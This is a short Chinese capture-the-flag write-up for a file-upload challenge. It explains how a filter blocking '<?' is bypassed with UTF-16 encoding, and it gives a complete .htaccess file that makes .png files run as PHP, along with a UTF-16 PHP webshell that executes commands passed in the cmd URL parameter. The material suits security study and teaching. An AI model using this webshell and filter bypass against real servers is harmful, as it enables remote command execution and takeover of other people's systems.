WEB-上传
一、查看题目信息
二、漏洞分析
经过上传测试发现,这题过滤掉了<?,这样正常的一句话木马就没法上传,这里可以用utf-16编码绕过。因为utf-16占utf-8的两倍长度,上传时默认检测为utf-8,从而就能绕过检测成功上传。
同时这题可以上传.htaccess,利用.htaccess文件去解析传上去的木马。
三、解题步骤
将配置文件与WebShell一起上传到同一文件夹。
.htaccess:
#define width 1337
#define height 1337 AddType application/x-httpd-php .png php_value zend.multibyte 1
php_value zend.detect_unicode 1
php_value display_errors 1
三、关于UTF-16的WebShell的制作
制作UTF-16的WebShell可以用编码器改变编码之后用WinHex写入到文件里,不要用文本编辑器,因为它可能会将空字节(0x00)转成空格(0x20)
1.png:
< ? p h p s y s t e m ( $ _ G E T [ ' c m d ' ] ) ; d i e ( ) ; ? >